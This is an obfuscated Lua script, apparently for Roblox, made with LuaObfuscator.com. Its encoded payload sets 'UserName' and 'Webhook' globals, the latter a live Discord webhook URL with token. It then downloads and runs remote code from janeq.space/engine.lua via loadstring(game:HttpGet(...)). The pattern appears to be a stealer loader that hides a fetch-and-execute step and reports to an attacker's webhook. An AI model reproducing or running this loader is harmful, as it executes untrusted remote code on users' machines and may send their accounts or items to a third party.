--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25()local v31=0 -0 ;local v32;local v33;local v34;local v35;local v36;local v37;while true do if (v31==(0 + 0 + 0)) then v32=v24();v33=v24();v31=2 -1 ;end if (v31==(5 -2)) then if (v36==(0 -(791 -(368 + 423)))) then if (v35==(0 -0)) then return v37 * (619 -((1744 -1189) + 64)) ;else local v104=0 -0 ;while true do if (v104==(931 -(857 + 74))) then v36=1;v34=568 -(367 + (219 -(10 + 8))) ;break;end end end elseif (v36==(1502 + (2096 -1551))) then return ((v35==((1369 -(416 + 26)) -(214 + 713))) and (v37 * ((1 + 0)/(0 + 0)))) or (v37 * NaN) ;end return v8(v37,v36-((6066 -4166) -(282 + 595)) ) * (v34 + (v35/((1639 -(1523 + 114))^(47 + 5)))) ;end if (v31==(2 + 0)) then v36=v21(v33,21,1028 -(915 + 82) );v37=((v21(v33,45 -13 )==1) and  -(1 + 0)) or ((1 + 0) -0) ;v31=3;end if (v31==(1 -0)) then v34=1066 -(68 + 997) ;v35=(v21(v33,1271 -(226 + 1044) ,87 -67 ) * ((1 + 1)^32)) + v32 ;v31=(441 -(145 + 293)) -1 ;end end end v26=nil;function v26(v38)local v39=430 -(44 + (1245 -(814 + 45))) ;local v40;local v41;while true do if (v39==((3666 -2178) -(998 + 488))) then v41={};for v80=1 + 0 , #v40 do v41[v80]=v2(v1(v3(v40,v80,v80)));end v39=3 + 0 + 0 ;end if (v39==(772 -(201 + 202 + 369))) then v40=nil;if  not v38 then local v100=1138 -(116 + 1022) ;while true do if (0==v100) then v38=v24();if (v38==(0 -0)) then return "";end break;end end end v39=1;end if (v39==(2 + 1)) then return v6(v41);end if ((3 -2)==v39) then v40=v3(v16,v19,(v19 + v38) -1 );v19=v19 + v38 ;v39=(892 -(261 + 624)) -5 ;end end end v18=5;end if (v18==7) then function v30(v42,v43,v44)local v45=0;local v46;local v47;local v48;while true do if (v45==1) then v48=v42[3];return function(...)local v82=v46;local v83=v47;local v84=v48;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v101=0,v90 do if (v101>=v84) then v88[v101-v84 ]=v89[v101 + 1 ];else v92[v101]=v89[v101 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=9) then if (v95<=4) then if (v95<=1) then if (v95>0) then v92[v94[2]]();else v92[v94[2]]=v44[v94[3]];end elseif (v95<=2) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95==3) then v92[v94[2]]=v44[v94[3]];else v86=v94[3];end elseif (v95<=6) then if (v95==5) then local v117=v94[2];v92[v117]=v92[v117](v13(v92,v117 + 1 ,v87));else do return;end end elseif (v95<=7) then local v119=v94[2];local v120=v92[v94[3]];v92[v119 + 1 ]=v120;v92[v119]=v120[v94[4]];elseif (v95>8) then local v139=v94[2];local v140,v141=v85(v92[v139](v13(v92,v139 + 1 ,v94[3])));v87=(v141 + v139) -1 ;local v142=0;for v157=v139,v87 do v142=v142 + 1 ;v92[v157]=v140[v142];end else v44[v94[3]]=v92[v94[2]];end elseif (v95<=14) then if (v95<=11) then if (v95>10) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==2) then for v163=v125,v87 do v128=v128 + 1 ;v92[v163]=v126[v128];end break;end if (0==v124) then v125=v94[2];v126,v127=v85(v92[v125](v13(v92,v125 + 1 ,v94[3])));v124=1;end if (v124==1) then v87=(v127 + v125) -1 ;v128=0;v124=2;end end else v92[v94[2]]=v94[3];end elseif (v95<=12) then v44[v94[3]]=v92[v94[2]];elseif (v95>13) then v92[v94[2]]=v94[3];else v86=v94[3];end elseif (v95<=16) then if (v95>15) then local v133=0;local v134;while true do if (v133==0) then v134=v94[2];v92[v134]=v92[v134](v13(v92,v134 + 1 ,v87));break;end end elseif (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95<=17) then do return;end elseif (v95>18) then local v149=0;local v150;local v151;while true do if (v149==0) then v150=v94[2];v151=v92[v94[3]];v149=1;end if (v149==1) then v92[v150 + 1 ]=v151;v92[v150]=v151[v94[4]];break;end end else v92[v94[2]]();end v86=v86 + 1 ;end end;end if (v45==0) then v46=v42[1];v47=v42[2];v45=1;end end end return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;function v24()local v49=0 -0 ;local v50;local v51;local v52;local v53;while true do if (v49==(1080 -(1020 + 60))) then v50,v51,v52,v53=v1(v16,v19,v19 + (1426 -(630 + 793)) );v19=v19 + ((1760 -(760 + 987)) -(1922 -(1789 + 124))) ;v49=4 -3 ;end if ((1 + 0)==v49) then return (v53 * 16777216) + (v52 * 65536) + (v51 * (881 -625)) + v50 ;end end end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v54,v55,v56)if v56 then local v70=766 -(745 + 21) ;local v71;while true do if (v70==(0 + 0)) then v71=(v54/((5 -3)^(v55-1)))%(((1420 -(447 + 966)) -5)^(((v56-(1 + 0)) -(v55-(1 + 0))) + 1)) ;return v71-(v71%(1056 -(87 + 968))) ;end end else local v72=(8 -6)^(v55-(1 + 0)) ;return (((v54%(v72 + v72))>=v72) and 1) or ((0 -0) -0) ;end end v22=nil;v18=2;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v57)if (v1(v57,2)==79) then v20=v0(v3(v57,1,1));return "";else local v73=v2(v0(v57,16));if v20 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v73,v20);v20=nil;v96=1;end end else return v73;end end end);v18=1;end if (v18==2) then function v22()local v58=1817 -(1703 + 114) ;local v59;while true do if (v58==(701 -(376 + 325))) then v59=v1(v16,v19,v19);v19=v19 + (1 -0) ;v58=(4 -2) -1 ;end if (v58==(1 + (14 -(9 + 5)))) then return v59;end end end v23=nil;function v23()local v60,v61=v1(v16,v19,v19 + (378 -(85 + 291)) );v19=v19 + (1267 -(243 + 1022)) ;return (v61 * (974 -718)) + v60 ;end v18=3;end if (v18==6) then v29=nil;function v29()local v62=0;local v63;local v64;local v65;local v66;local v67;local v68;local v69;while true do if (v62==3) then v69=nil;while true do local v98=214 -(22 + 192) ;local v99;while true do if (0==v98) then v99=0;while true do if (v99==(0 -0)) then local v110=0 + 0 ;while true do if (v110~=(0 -0)) then else if (v63==(1465 -(1404 + 59))) then local v152=0 -0 ;local v153;while true do if (v152==(0 -0)) then v153=0;while true do if (0~=v153) then else local v171=765 -(468 + 297) ;local v172;while true do if (0~=v171) then else v172=0;while true do if ((580 -(361 + 219))==v172) then local v182=0;while true do if (v182==(321 -(53 + 267))) then v172=1 + 0 ;break;end if (v182~=(413 -(15 + 398))) then else for v186=983 -(18 + 964) ,v68 do local v187=0 -0 ;local v188;local v189;local v190;local v191;while true do if (v187==2) then while true do if (v188==0) then local v200=0;while true do if (v200==(0 -0)) then v189=0 -0 ;v190=nil;v200=1 + 0 ;end if (v200==(1 + 0)) then v188=851 -(20 + 830) ;break;end end end if (v188~=(1 + 0)) then else v191=nil;while true do if ((126 -(116 + 10))==v189) then local v203=0 + 0 ;while true do if (v203==(1 + 0)) then v189=739 -(542 + 196) ;break;end if (v203~=(0 -0)) then else v190=v22();v191=nil;v203=1 + 0 ;end end end if ((2 -1)~=v189) then else if (v190==(2 -1)) then v191=v22()~=(0 + 0) ;elseif (v190==2) then v191=v25();elseif (v190==(2 + 1)) then v191=v26();end v69[v186]=v191;break;end end break;end end break;end if (v187==(0 -0)) then local v198=0;while true do if (v198==(0 -0)) then v188=0;v189=nil;v198=2 -1 ;end if ((1552 -(1126 + 425))==v198) then v187=406 -(118 + 287) ;break;end end end if (v187==(3 -2)) then local v199=1121 -(118 + 1003) ;while true do if (v199~=(164 -(92 + 71))) then else v187=5 -3 ;break;end if (v199==(0 -0)) then v190=nil;v191=nil;v199=1;end end end end end v67[768 -(574 + 191) ]=v22();v182=378 -(142 + 235) ;end end end if ((4 -3)~=v172) then else v153=2 -1 ;break;end end break;end end end if ((1 + 0)==v153) then for v174=1 + 0 ,v24() do local v175=977 -(553 + 424) ;local v176;local v177;local v178;while true do if (v175~=(0 -0)) then else v176=0;v177=nil;v175=1 -0 ;end if (v175==(1 + 0)) then v178=nil;while true do if ((1 + 0)~=v176) then else while true do if (v177==(0 + 0)) then v178=v22();if (v21(v178,1 + 0 ,1 + 0 )==(0 -0)) then local v192=0 -0 ;local v193;local v194;local v195;local v196;local v197;while true do if (v192==2) then v197=nil;while true do if (v193==(2 -1)) then local v201=0 + 0 ;while true do if (v201~=0) then else v196=nil;v197=nil;v201=2 -1 ;end if (v201~=(1 + 0)) then else v193=2 -0 ;break;end end end if (v193==(0 -0)) then local v202=806 -(118 + 688) ;while true do if (v202~=(754 -(239 + 514))) then else v193=1 + 0 ;break;end if (v202==(1329 -(797 + 532))) then v194=0 + 0 ;v195=nil;v202=1 + 0 ;end end end if ((6 -4)~=v193) then else while true do if (v194~=3) then else if (v21(v196,6 -3 ,3)~=(1203 -(373 + 829))) then else v197[4]=v69[v197[735 -(476 + 255) ]];end v64[v174]=v197;break;end if (v194==(1131 -(369 + 761))) then local v206=0 + 0 ;local v207;while true do if (v206==(0 -0)) then v207=0 -0 ;while true do if (v207==1) then v194=3 -1 ;break;end if (v207==(238 -(64 + 174))) then local v213=0 + 0 ;while true do if (v213==0) then v197={v23(),v23(),nil,nil};if (v195==0) then local v218=216 -(42 + 174) ;local v219;local v220;local v221;while true do if (v218~=(0 + 0)) then else v219=0 + 0 ;v220=nil;v218=1 + 0 ;end if (v218==1) then v221=nil;while true do if (v219==(1505 -(363 + 1141))) then while true do if (v220==0) then v221=1580 -(1183 + 397) ;while true do if ((0 + 0)==v221) then v197[8 -5 ]=v23();v197[3 + 1 ]=v23();break;end end break;end end break;end if (v219~=(0 + 0)) then else local v224=0;while true do if (v224==(0 + 0)) then v220=0;v221=nil;v224=534 -(43 + 490) ;end if ((734 -(711 + 22))==v224) then v219=1976 -(1913 + 62) ;break;end end end end break;end end elseif (v195==1) then v197[3]=v24();elseif (v195==(2 + 0)) then v197[3]=v24() -((861 -(240 + 619))^(42 -26)) ;elseif (v195~=(1936 -(565 + 1368))) then else local v225=0 -0 ;local v226;local v227;local v228;while true do if (v225==(1661 -(1477 + 184))) then v226=0;v227=nil;v225=1 -0 ;end if (v225~=(1 -0)) then else v228=nil;while true do if ((1 + 0)==v226) then while true do if (0==v227) then v228=856 -(564 + 292) ;while true do if (v228==0) then v197[4 -1 ]=v24() -((407 -(255 + 150))^(48 -32)) ;v197[4]=v23();break;end end break;end end break;end if (v226==0) then v227=304 -(244 + 60) ;v228=nil;v226=1;end end break;end end end v213=1 + 0 ;end if (v213==1) then v207=4 -3 ;break;end end end end break;end end end if (v194==(478 -(41 + 435))) then local v208=1739 -(404 + 1335) ;while true do if (v208==(1002 -(938 + 63))) then v194=3 + 0 ;break;end if (v208==(1125 -(936 + 189))) then local v212=0 + 0 ;while true do if (1~=v212) then else v208=1614 -(1565 + 48) ;break;end if (v212~=(0 + 0)) then else if (v21(v196,1,1 + 0 )==(1139 -(782 + 356))) then v197[269 -(176 + 91) ]=v69[v197[4 -2 ]];end if (v21(v196,2,2 -0 )==(1 + 0)) then v197[340 -(10 + 327) ]=v69[v197[3 + 0 ]];end v212=339 -(118 + 220) ;end end end end end if (0~=v194) then else local v209=0 + 0 ;while true do if (v209==(449 -(108 + 341))) then v195=v21(v178,2,1095 -(975 + 117) );v196=v21(v178,4,3 + 3 );v209=1876 -(157 + 1718) ;end if (v209==1) then v194=1 + 0 ;break;end end end end break;end end break;end if (v192~=(4 -3)) then else v195=nil;v196=nil;v192=6 -4 ;end if (v192==0) then v193=1493 -(711 + 782) ;v194=nil;v192=1;end end end break;end end break;end if (v176==(0 -0)) then local v184=1018 -(697 + 321) ;while true do if (v184==(0 -0)) then v177=469 -(270 + 199) ;v178=nil;v184=1 + 0 ;end if (v184==(1820 -(580 + 1239))) then v176=2 -1 ;break;end end end end break;end end end v63=3 + 0 ;break;end end break;end end end if (v63==(0 + 0)) then local v154=0;local v155;local v156;while true do if ((1 -0)==v154) then while true do if ((0 -0)==v155) then v156=0 -0 ;while true do if (v156~=(1168 -(645 + 522))) then else v66={};v63=1 + 0 ;break;end if (v156~=(0 + 0)) then else local v179=0;while true do if (v179==(0 -0)) then local v183=0 -0 ;while true do if (v183~=(1228 -(322 + 905))) then else v179=612 -(602 + 9) ;break;end if (0~=v183) then else v64={};v65={};v183=1;end end end if (v179~=(2 -1)) then else v156=1190 -(449 + 740) ;break;end end end end break;end end break;end if (v154==(872 -(826 + 46))) then v155=1574 -(1281 + 293) ;v156=nil;v154=267 -(28 + 238) ;end end end v110=2 -1 ;end if (v110==(1560 -(1381 + 178))) then v99=1;break;end end end if (v99~=(1 + 0)) then else if (v63==(1 + 0)) then local v111=0 + 0 ;while true do if (v111==(3 -2)) then v69={};v63=2;break;end if (v111==(0 + 0)) then v67={v64,v65,nil,v66};v68=v24();v111=1 -0 ;end end end if (v63~=(9 -6)) then else local v112=0;local v113;local v114;while true do if (v112==(0 + 0)) then v113=1898 -(260 + 1638) ;v114=nil;v112=1 -0 ;end if (1==v112) then while true do if (v113~=(1784 -(214 + 1570))) then else v114=440 -(382 + 58) ;while true do if (v114~=(1455 -(990 + 465))) then else local v173=0 + 0 ;while true do if (v173~=(0 + 0)) then else for v180=1 + 0 ,v24() do v65[v180-(3 -2) ]=v29();end return v67;end end end end break;end end break;end end end break;end end break;end end end break;end if (v62~=(1 + 0)) then else local v77=0 -0 ;local v78;while true do if (v77~=0) then else v78=1726 -(1668 + 58) ;while true do if (v78~=(0 -0)) then else local v109=0 -0 ;while true do if (v109==1) then v78=1 -0 ;break;end if (0==v109) then v65=nil;v66=nil;v109=1;end end end if (v78==(3 -2)) then v62=1 + 1 ;break;end end break;end end end if (v62==0) then local v79=1205 -(902 + 303) ;while true do if (v79==(0 -0)) then v63=0;v64=nil;v79=1 + 0 ;end if (v79~=(2 -1)) then else v62=1 + 0 ;break;end end end if (v62==2) then v67=nil;v68=nil;v62=1693 -(1121 + 569) ;end end end v30=nil;v18=7;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203073O00446F732O652O64030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F6A616E65712E73706163652F656E67696E652E6C756103083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134353334323732353031373832393438372F74765A384F4845393376626C30726347382O5365792O6E394A464C6B6D74487668437872746B506D4B57567441564459676A77586F44716474356B3565784E42646B4A4C00163O00120A3O00013O0026023O000D0001000200040D3O000D000100120A000100043O00120C000100033O001203000100053O001203000200063O00200700020002000700120A000400084O000B000200044O001000013O00022O001200010001000100040D3O001500010026023O00010001000100040D3O0001000100120A000100043O00120C000100093O00120A0001000B3O00120C0001000A3O00120A3O00023O00040D3O000100012O00063O00017O00",v9(),...);
